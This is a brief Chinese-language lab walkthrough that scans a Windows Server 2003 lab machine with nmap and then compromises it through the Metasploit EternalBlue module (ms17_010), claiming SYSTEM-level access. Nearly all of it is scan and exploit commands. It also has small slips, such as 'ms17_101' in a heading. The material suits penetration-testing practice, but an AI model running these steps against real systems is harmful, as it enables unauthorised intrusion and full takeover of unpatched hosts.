1:kali
靶机:Windows Server 2003
端口扫描
1.用nmap端口扫描靶机
nmap -sP 192.168.157.0/24 #扫描192.168.157.0这个网段存活的主机
靶机的IP为192.168.157.130
2
nmap -sV192.168.157.130 -p- #-sV 参数用于启用版本检测,192.168.157.130 是目标主机的IP地址,-p- 参数用于扫描所有端口
msfconsole
1. ms17_101
search ms17_010 #询问有关"ms17_010"的漏洞信息
2.use
use 1 #利用1这个模块
3.options
show options #列出模块所需的各种参数
4.set
set rhosts 192.168.157.130 # 设置远程目标主机的IP地址为192.168.157.130
5.exploit
exploit #执行攻击
6.获得system32,Windows最高权限
